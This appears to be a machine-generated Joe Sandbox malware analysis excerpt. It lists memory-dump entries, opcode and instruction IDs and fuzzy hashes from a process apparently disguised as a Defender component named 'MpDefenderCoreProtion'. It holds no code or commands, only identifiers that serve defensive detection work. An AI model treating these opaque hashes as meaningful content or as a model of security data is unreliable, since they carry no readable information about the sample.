                                      • Instruction ID: 7a7ed8f491a589bfe7c5c202e7acf9177a5a0910583bec64d01d14a0455562b4
                                      • Opcode Fuzzy Hash: e2f667edc8337ffab70928d87c68d9b163ca29d08c161128d95e9cd0ff816d72
                                      • Instruction Fuzzy Hash: 1F417A70B006149FDB14DF6ED555B9EBBF6BF89710F24806AE406EB3A4CE719C018B90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Teq
                                      • API String ID: 0-1098410595
                                      • Opcode ID: 7c66bcfb3f506e4cf6715c96340a139dcaef1a0276c5d96f23be867471a5a392
                                      • Instruction ID: 04d52b7a3c01cca000c1981052007170e4745a7febcf84652b2add0747b2a624
                                      • Opcode Fuzzy Hash: 7c66bcfb3f506e4cf6715c96340a139dcaef1a0276c5d96f23be867471a5a392
                                      • Instruction Fuzzy Hash: C2218E31B402158FDB14DB69E859BAEBBF6BF88710F24005AE501EF3A0CF759D018B91
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 636736b84588446cd863fb49ffe1dd2e252a2c8bfc03013449e8be8cdfc891ad
                                      • Instruction ID: 04ba6c1f10a9ec8daf4da9eac5e25cdc9782203be99f26111c460b8681927a67
                                      • Opcode Fuzzy Hash: 636736b84588446cd863fb49ffe1dd2e252a2c8bfc03013449e8be8cdfc891ad
                                      • Instruction Fuzzy Hash: 3B02AC747047018FCB15DB3CE495A2E7BE6BF89604B1948A9E946CF362DB34EC46C7A0
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c037d0246db7847746f09a7b5a6694f08b226086396fa987f1fde3b28598860c
                                      • Instruction ID: 68086172e336e94af29408e58325ca5c9d473d9c546612b6e6b047ee4ef7f193
                                      • Opcode Fuzzy Hash: c037d0246db7847746f09a7b5a6694f08b226086396fa987f1fde3b28598860c
                                      • Instruction Fuzzy Hash: 7351A0707047408FCB25CF38E495A6EBBF6BF85229B044899E556CF3A2DB31E845CB61
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d93a785634c2732341c23ea0982b54637d6b5d9b99d0db6f51c94b7fadbf4f70
                                      • Instruction ID: 8f8b8c5202baf1af14a33c6ba31238502e9d0d7445d5de49966fb5f54e9cdc43
                                      • Opcode Fuzzy Hash: d93a785634c2732341c23ea0982b54637d6b5d9b99d0db6f51c94b7fadbf4f70
                                      • Instruction Fuzzy Hash: C451E675300B018FCB29DF39E49996EB7F6BF89218B5109A9E506CB361DB31EC45CB60
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf31b01319b106320a340ee9ca1ccd396d7de91614c56248765d89200962b9b4
                                      • Instruction ID: 35c3d01c64ade9b3cde53b557f9d5a5336ddcf0b8b7f4771653048d50bc2c0e9
                                      • Opcode Fuzzy Hash: bf31b01319b106320a340ee9ca1ccd396d7de91614c56248765d89200962b9b4
                                      • Instruction Fuzzy Hash: B7317E71A00209DFDB18CF68E449BADBBF2FF49310F208569F415AB2A1DB75A945CB40
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6150c037a22b017b682b951e046aa3200409511868c64794b8dfa25637cec175
                                      • Instruction ID: f45165acde428eabb7a4ea0d3ee11523a667c9091871cb155c95046ec0016f82
                                      • Opcode Fuzzy Hash: 6150c037a22b017b682b951e046aa3200409511868c64794b8dfa25637cec175
                                      • Instruction Fuzzy Hash: E71193357043008FCB06DB6CE845E7D7BF6EF8962075945A6F54ACB772DA21DC0287A0
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e9902ac8f51c4c500b659520592c6f7dd07d5c36590fe4cdcbe39a0fbd4d2918
                                      • Instruction ID: 69d47e1a606956bf827792b2565e3920cd7c6a018d3d5c465aa45c80d1a32245
                                      • Opcode Fuzzy Hash: e9902ac8f51c4c500b659520592c6f7dd07d5c36590fe4cdcbe39a0fbd4d2918
                                      • Instruction Fuzzy Hash: E0311A70E01209DFDB04EFA9E495AEEBBF2FF49304F204429E415BB250DB75A905CB91
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ccf5171eb392199705e62ffd84912b12afbc577d21a5250626e0c07d200949ad
                                      • Instruction ID: 0eb3f82e8179db5fa019503bae2d3464b54ef4ceaed86c9e4e67679564696e3c
                                      • Opcode Fuzzy Hash: ccf5171eb392199705e62ffd84912b12afbc577d21a5250626e0c07d200949ad
                                      • Instruction Fuzzy Hash: 21310770E01209DFDB04EFA9E485AEEBBB2FF49300F208429E415AB250DB75AD05CB61
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7925e3f0f8cae3ac453d9cc12449f1bcf94b12b7f5dd028fa4e47e162a2d4f01
                                      • Instruction ID: 2cd50118181f023a3431cc2e78b369c07055ccabb6c4745f385ea39e49d58caf
                                      • Opcode Fuzzy Hash: 7925e3f0f8cae3ac453d9cc12449f1bcf94b12b7f5dd028fa4e47e162a2d4f01
                                      • Instruction Fuzzy Hash: 2501F5777443194BD312563DB84165E7BDAE7C6765F28013AFA0ACB385CE66EC428390
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a762163a6d027ed2c23719077667d8fd71673b0cdc60b75284f7783dc080cf71
                                      • Instruction ID: 14d59955372149ba9b0f3b6fa64e890f7f7f281d38b91f471a9e43fa3800d953
                                      • Opcode Fuzzy Hash: a762163a6d027ed2c23719077667d8fd71673b0cdc60b75284f7783dc080cf71
                                      • Instruction Fuzzy Hash: 120117352146008FC314CF29D889D66BBF6FF89721B550999E546CB762CB32EC05CB20
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4e06e504c404327ddf1e17aee837cea1788c1de3ee57b58e7c1021bd546cb561
                                      • Instruction ID: dda1d064b958061f406e73c421ede2aae84b00588a16b526e990d7ef7712b4a4
                                      • Opcode Fuzzy Hash: 4e06e504c404327ddf1e17aee837cea1788c1de3ee57b58e7c1021bd546cb561
                                      • Instruction Fuzzy Hash: 19F0F6313053018FDB14A52DA941B2FA3DAEBC8550718963EA50ACF745EE74EC0283A4
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42ec99ea2fbbddd752fb261e53e0aef61f9a2446a8c7ecddabcacd01eea1652c
                                      • Instruction ID: 708b3fe0d0bd7a1ea0fe9c699877ebb50aaa6eb1ea2f34c09d49c31a9580a006
                                      • Opcode Fuzzy Hash: 42ec99ea2fbbddd752fb261e53e0aef61f9a2446a8c7ecddabcacd01eea1652c
                                      • Instruction Fuzzy Hash: ADF0C2757086504FD3014B3EA891A257BFAFFC662071981ABE515CF3B2C920CC058351
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 118318f7b933497407fbd0dc7c5b3009d75502ff0c7ae73446b7006ea95e6e86
                                      • Instruction ID: d7b2c2944215e48ed0d77aae74fd48f06b8bb0f8691b8ab6a15fcdbb8b672b83
                                      • Opcode Fuzzy Hash: 118318f7b933497407fbd0dc7c5b3009d75502ff0c7ae73446b7006ea95e6e86
                                      • Instruction Fuzzy Hash: 18F0BE317006008FC3048B2EE880AAA77F6FFC576072980AAE409CB372CA61CC07CB50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6167a6c306ea15a721b6b4e1635e7a1ee2318a332ca66ab7d1e586b74677a91b
                                      • Instruction ID: fd8b355f242ef2d4adf0af714f0aa74ab7dec4658706c4ef536fa08df442a2c9
                                      • Opcode Fuzzy Hash: 6167a6c306ea15a721b6b4e1635e7a1ee2318a332ca66ab7d1e586b74677a91b
                                      • Instruction Fuzzy Hash: BCF085357005006FC210869EE884E06BBEABFC8A24B288069F20ACB371D960EC028650
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 491ce30abab912958dda4aa3aa998ed1ee1dd56af92ec12ea629b2d482425cf1
                                      • Instruction ID: 6adc4a9da2181bade3bd2d0624dc635c3b59affe99751b779e71dfead60b18b9
                                      • Opcode Fuzzy Hash: 491ce30abab912958dda4aa3aa998ed1ee1dd56af92ec12ea629b2d482425cf1
                                      • Instruction Fuzzy Hash: D3F0E5367442015FC315429EF855A96BBFAFFC937573884BFE009CB361D965CC428621
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c10378a855f91a92f58382665aadd8be3c9813bf5e5139ca7573fd7dc80c03b
                                      • Instruction ID: 80811e72aed2eb088260dd08d8fae2acd7b217af7690b3a9d05e09d502e90ddb
                                      • Opcode Fuzzy Hash: 2c10378a855f91a92f58382665aadd8be3c9813bf5e5139ca7573fd7dc80c03b
                                      • Instruction Fuzzy Hash: FAF0BE6090E38A9FCB02CBB4AD5A64C7FB4EB43200B0840EFE448CF2A3C5240D089352
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a5c85feb02403272383a632069152211005c15a3d3dc6533d26cdc6ea0670ae
                                      • Instruction ID: be4013b8fc1c8b27df65764a6273734bf8ea35cd3f3a235e3f0897d4c34fb4ac
                                      • Opcode Fuzzy Hash: 1a5c85feb02403272383a632069152211005c15a3d3dc6533d26cdc6ea0670ae
                                      • Instruction Fuzzy Hash: 7CF01774A0121DDFDB25DFA4E99ABAEBFB2BB44305F100419E002AB284CB741941CB81
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7bb05e0fcb78c82e2e925a0dd71d6d615157de7d13353bc81434ab9d9fd78970
                                      • Instruction ID: ca40b2c0448aa186eec15ae68e23f53a3fd7453a4779aa76a9f7f22ae8582162
                                      • Opcode Fuzzy Hash: 7bb05e0fcb78c82e2e925a0dd71d6d615157de7d13353bc81434ab9d9fd78970
                                      • Instruction Fuzzy Hash: 59F08C70C043499FCB40DFB8D9416EEBFF8EF05200F1045AAC059E7151E7701A05CBA2
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 394b5b1aa16a98485e8a23b8d13add0d9ff29ae8dd6b48d672052436e304f38e
                                      • Instruction ID: 8616a03f7dbf8f4d5be6192bd057bf66b6455f1474c9f744976c8ca117699dc2
                                      • Opcode Fuzzy Hash: 394b5b1aa16a98485e8a23b8d13add0d9ff29ae8dd6b48d672052436e304f38e
                                      • Instruction Fuzzy Hash: B8E0C23630161297FB08155DB1113FF3ACCEB45265F0884BAE90DCB240EB2AC8418391
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 418ef587973b410cbcd92862595c3bc40754a2b1bad0ff24727a452aea474432
                                      • Instruction ID: d302f44bcb382ece58142773a82a635055771c8cc8fad0cec85986529c03a346
                                      • Opcode Fuzzy Hash: 418ef587973b410cbcd92862595c3bc40754a2b1bad0ff24727a452aea474432
                                      • Instruction Fuzzy Hash: 00E04F32645349EFC725CBB499114ED7BF8AA45321B2501EBD401DA165DA3A8941CB51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bf2d5ff25fe20aae22a1bf8478ab5cb0889c48d91a8dbb04409678ac9d88749
                                      • Instruction ID: 4abaf9ca7d9965d018c10df97396d2071899bd95033d700c57f421a6d502c482
                                      • Opcode Fuzzy Hash: 4bf2d5ff25fe20aae22a1bf8478ab5cb0889c48d91a8dbb04409678ac9d88749
                                      • Instruction Fuzzy Hash: 69E0E571D1031AAFCB40EFA8DA457EEBBF8EF04211F10456AC519E7244EB706B15CBA2
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b91dc8f242ba2bb558d69fce3aa7f37764fe1417dd7328f3bb5352df3abcc511
                                      • Instruction ID: 533b28d79d3e254837202c1ca477e79137da005274010f33b84e5813e4355319
                                      • Opcode Fuzzy Hash: b91dc8f242ba2bb558d69fce3aa7f37764fe1417dd7328f3bb5352df3abcc511
                                      • Instruction Fuzzy Hash: 85D01732A0520CABCB20DEB4A9015AABBECEB09205B1006EA9D09D7214EE32DA1097D1
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 07d03f464d5e789c281347c3f6af7d0c5bf9818054771e13af993c6f4783e7ff
                                      • Instruction ID: 8b83d7826d6bc2ff55bcbcefa3ab28f872518b26cd48c17c4480ebbe5c547d0a
                                      • Opcode Fuzzy Hash: 07d03f464d5e789c281347c3f6af7d0c5bf9818054771e13af993c6f4783e7ff
                                      • Instruction Fuzzy Hash: 08D05E70A0620DEFCF00DFA9FA4299DBBF9EB44204B1041ADE80DD7300EA312F04AB91
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f12dde5ae14764e1454d3fa30ebc98f6b0cfea6f0a437825fb892c35f52286c
                                      • Instruction ID: 69bf9fea6073fe93b8e4da93f1c5cc9a73a1e386826640b1955c892a585a9578
                                      • Opcode Fuzzy Hash: 0f12dde5ae14764e1454d3fa30ebc98f6b0cfea6f0a437825fb892c35f52286c
                                      • Instruction Fuzzy Hash: C6D0A938600A0ACBC7429F0CD004B52B3A9FF8070DF240268952406382CB3A5C26DF42